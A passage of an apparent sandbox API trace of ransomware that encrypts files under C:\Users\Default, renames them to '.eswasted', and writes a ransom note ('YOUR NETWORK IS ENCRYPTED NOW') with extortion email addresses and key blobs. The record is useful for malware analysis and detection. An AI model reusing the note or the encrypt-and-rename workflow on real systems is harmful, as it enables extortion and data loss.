0x4ea288 [0083.512] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0083.513] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea288 | out: pbBuffer=0x4ea288) returned 1 [0083.513] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.eswasted_info" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0083.514] WriteFile (in: hFile=0x118, lpBuffer=0x4ea288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ea288*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0083.515] SetEndOfFile (hFile=0x118) returned 1 [0083.515] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.515] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea288 | out: hHeap=0x4a0000) returned 1 [0083.515] lstrcpyW (in: lpString1=0x4ea070, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.515] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.eswasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.eswasted")) returned 1 [0083.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.eswasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0083.516] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0083.516] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x10000 [0083.516] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10000) returned 0x2d0000 [0083.516] CloseHandle (hObject=0x110) returned 1 [0083.523] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.524] CloseHandle (hObject=0xfc) returned 1 [0083.524] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea288 [0083.524] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0083.524] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea2d0 | out: pbBuffer=0x4ea2d0) returned 1 [0083.524] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.524] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0083.525] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0083.525] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.534] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea490 [0083.535] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea288 | out: hHeap=0x4a0000) returned 1 [0083.535] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e0c48 [0083.535] _snwprintf (in: _Dest=0x4e0c48, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]fddZN49L1DJaQ0zP17JA3Peoy9mlga808eBZVw3OkP+e8ZGPvHG2EYG5IzwIQnW1\r\n6DQhIKk87KCs/yqHB2xJ7PjPo4ghNWnU4hcLxEM5FyqQ1aBtgKxMKBLu8cPoDq3S\r\nFctTtuvzFuaWAo3uOqkBNi5TRczXu9aSIOJO3RzeSg9xBfE5YUw6NHnyICAMIm5a\r\ndSWf+azd4ft4QkDlzTSIUiNCy3yUM2DTFjZV1RtSDUjr9S9iCCo1+R6+CxahZLTE\r\nQn6tXI+O2eVgNpFe+MCmvQguw9JZJaQENSYijD65Pwcmar8yaQW2D/Hqry6R6G1B\r\nub+7e7EuGh1n9yeDgq+AMceH9natDys1MwWmB/iFI891wEcWg2UGC3uIevlZDiU7\r\nVxEunH3OULrLD1ir6VbA/0hSJ6vrCmAO/Y7Y+CwOOZKjWEcVIrtll15AejnH41bd\r\nqxSF7iq3V1EY+Ron+n/GywRG5Gm9aNYciPvil19zluenYVrfXyF4K0wp4luuCqrW\r\nQMGYjXhPrVcnj2pL/miLIBhnkKkMcaNKRp55GBj/XBDPm17eZSE2o/BVCubFLBqa\r\n1fOSqO4LknsaaViiEtzWr9KM2+6azq9mugoIbkTSFZV1F+tSs4CBUAzgQxWaKSb1\r\nVbHZ8IIeCOdKw87AgvA/TfDdyHuE6YhkyJm9fHeOYwC=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.535] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea490 | out: hHeap=0x4a0000) returned 1 [0083.535] WriteFile (in: hFile=0x118, lpBuffer=0x4e0c48*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4e0c48*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0083.535] SetEndOfFile (hFile=0x118) returned 1 [0083.538] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0c48 | out: hHeap=0x4a0000) returned 1 [0083.538] CloseHandle (hObject=0x118) returned 1 [0083.538] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0083.538] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x504f48 | out: hHeap=0x4a0000) returned 1 [0083.538] _aulldvrm () returned 0x0 [0083.538] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0083.539] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0083.539] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.539] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0083.539] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ec) returned 0x4e9fd8 [0083.539] lstrcpyW (in: lpString1=0x4ea0ba, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.539] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea2d0 [0083.539] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0083.540] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea2d0 | out: pbBuffer=0x4ea2d0) returned 1 [0083.540] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.eswasted_info" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0083.541] WriteFile (in: hFile=0x118, lpBuffer=0x4ea2d0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ea2d0*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0083.542] SetEndOfFile (hFile=0x118) returned 1 [0083.542] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.542] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea2d0 | out: hHeap=0x4a0000) returned 1 [0083.542] lstrcpyW (in: lpString1=0x4ea0ba, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.eswasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.eswasted")) returned 1 [0083.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.eswasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0083.544] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0083.544] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x80000 [0083.544] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80000) returned 0x1220000 [0083.544] CloseHandle (hObject=0xfc) returned 1 [0083.610] UnmapViewOfFile (lpBaseAddress=0x1220000) returned 1 [0083.615] CloseHandle (hObject=0x110) returned 1 [0083.615] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea2d0 [0083.615] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0083.616] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea318 | out: pbBuffer=0x4ea318) returned 1 [0083.616] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.616] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0083.617] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0083.617] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.625] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea4d8 [0083.625] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea2d0 | out: hHeap=0x4a0000) returned 1 [0083.625] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e09f0 [0083.625] _snwprintf (in: _Dest=0x4e09f0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]OdnioDV4HeCbzqMcAtgjeIpOt1f316d2/s+DoTf7FW+ZTLLlgXRHa3j1tv4M2weh\r\nvBFbCUjtD3nqNXHVYcKtzqm/PnboIa5lv/2mvcXvoa0tribCfsScH5skZ3t6El1w\r\nt12VddWh2/GHpAHDtP8EF065aKFr/U9KpnHIJcxTbKZ98qbknsDNeZVD3cdhqKZW\r\njSbgMpwN1BKrNJTGk7zrxEmDthqJ0XR52RgGootnetNZoLMrOrdt2HbM1fcK859W\r\nt7coA9J76fre1ZtIuK8qJNx1waHgddVRXam5VH7TrN5/SxELAklTfYsltVWgNFQ9\r\nST0MvNvqmSMv/pTa0dI/o2JHrH0Oc9TSOWDkDbGFkvtCdUbmm3N3ENIZzPTbqwAc\r\nrKFh2kEOH3UFw4sec4nr2H6YbIMzi4qXJEKB/1H754h80kXRzf8nIHMTgKqNvMVF\r\n961AknBR4a4ftnOQmpbMrByrVQLPlAnBSes5UEqGPISzP+Crjm0zeiS4nQSwR4fy\r\nplFvcgZihb/13H5wUfIaFwMAd9o3/GzeQLwqkZ/1Y/5lZRRMMjw3NKX7Yp9+zbet\r\n1FvPh0R1Ghq/h4ajBWw28hfF3NwWZMGwL8H8IJR8A3m5JTOA8xAeA7VLUhthEnf3\r\n0hjzv4pv32HHdGyKdGkq+Utpj8uTPU8Y6TSEai2dZR+=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.625] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea4d8 | out: hHeap=0x4a0000) returned 1 [0083.625] WriteFile (in: hFile=0x118, lpBuffer=0x4e09f0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4e09f0*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0083.626] SetEndOfFile (hFile=0x118) returned 1 [0083.628] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0083.628] CloseHandle (hObject=0x118) returned 1 [0083.628] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0083.628] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50bdf8 | out: hHeap=0x4a0000) returned 1 [0083.628] _aulldvrm () returned 0x0 [0083.628] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0083.629] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0083.629] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.629] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms") returned 50 [0083.629] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x26e) returned 0x4e9fd8 [0083.629] lstrcpyW (in: lpString1=0x4ea03c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.629] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea250 [0083.629] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0083.630] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea250 | out: pbBuffer=0x4ea250) returned 1 [0083.630] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted_info" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0083.631] WriteFile (in: hFile=0x118, lpBuffer=0x4ea250*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ea250*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0083.632] SetEndOfFile (hFile=0x118) returned 1 [0083.632] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea250 | out: hHeap=0x4a0000) returned 1 [0083.632] lstrcpyW (in: lpString1=0x4ea03c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.eswasted")) returned 1 [0083.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.634] GetLastError () returned 0x5 [0083.634] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.eswasted")) returned 0x23 [0083.634] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted", dwFileAttributes=0x22) returned 1 [0083.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0083.634] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0083.634] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xf8 [0083.634] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf8) returned 0x2d0000 [0083.635] CloseHandle (hObject=0x110) returned 1 [0083.635] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.635] CloseHandle (hObject=0x120) returned 1 [0083.635] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted", dwFileAttributes=0x23) returned 1 [0083.635] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea250 [0083.635] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0083.636] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea298 | out: pbBuffer=0x4ea298) returned 1 [0083.636] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.636] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0083.637] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0083.637] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.645] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea458 [0083.645] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea250 | out: hHeap=0x4a0000) returned 1 [0083.645] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e09f0 [0083.645] _snwprintf (in: _Dest=0x4e09f0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]R3rPheps69LWx2BCkC+vqelDUsr8dz53k6UMeUs6U/4Z+7Xusd+JBsfnRW7tn760\r\nEtby8C33gCiE9MHKjFdhv1ZFkdbOR6+0VN4mYnJgqneppxInsK6x1JWd5RNeX5Af\r\n2vJ6POk1RHpXNNCPykhw9o35+rw+23a6AXtdKeE3Ri9vaJxsvglvpGVpZFXF40PE\r\nHnAmxf7Iyy3/7K7/7h3WrDpadHxoQUkcVOTan3P2S/qmU0Drjnq7siO4EiKZd9Jd\r\n1X4DmeNrqEy2qrg5uClbpnjpllEhEai4iMqlspk83ZJ+d+5/oFY+uHPwm1RLSot5\r\nxvWLzx7llh1b/Hh4Cr0a+G1pqqE9loINPsk0yOugIpTSX0S6ZOTrpw3fPynBYzfz\r\nS3G8dWH4C7PbmL0uT0zlGiuQFpZxac/sKOzPlhGnhUu6O9vLiivwlYtVmGbbm2fw\r\n/IJtWmAKkz1iXr/HrKtCpRs9XKdHTL2QPRh8+KBBYtBvuNr+KocRloRAaVVrFpvx\r\nqP7hReXnZNHYZwJ4ceIlIva7JD76akb8kxHV00RskxfqEkP7Xd7PDm3sPJdWX5V8\r\nIzodZl7OTttAKJir3cr9pgz9xEtgG6wP21CEMB3wmA3yH2B/u/D9OK02KSnXeKl2\r\nkkApetjgXcDGWKNRy04MkZJO4qFQxAfeKNvN9Ohf6sZ=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.645] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea458 | out: hHeap=0x4a0000) returned 1 [0083.645] WriteFile (in: hFile=0x118, lpBuffer=0x4e09f0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4e09f0*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0083.645] SetEndOfFile (hFile=0x118) returned 1 [0083.647] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0083.647] CloseHandle (hObject=0x118) returned 1 [0083.647] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0083.647] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x502488 | out: hHeap=0x4a0000) returned 1 [0083.648] _aulldvrm () returned 0x0 [0083.648] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0083.648] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0083.648] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.648] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms") returned 57 [0083.648] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27c) returned 0x4e9fd8 [0083.648] lstrcpyW (in: lpString1=0x4ea04a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.648] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea260 [0083.648] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0083.649] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea260 | out: pbBuffer=0x4ea260) returned 1 [0083.649] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted_info" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0083.650] WriteFile (in: hFile=0x118, lpBuffer=0x4ea260*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ea260*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0083.651] SetEndOfFile (hFile=0x118) returned 1 [0083.651] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, 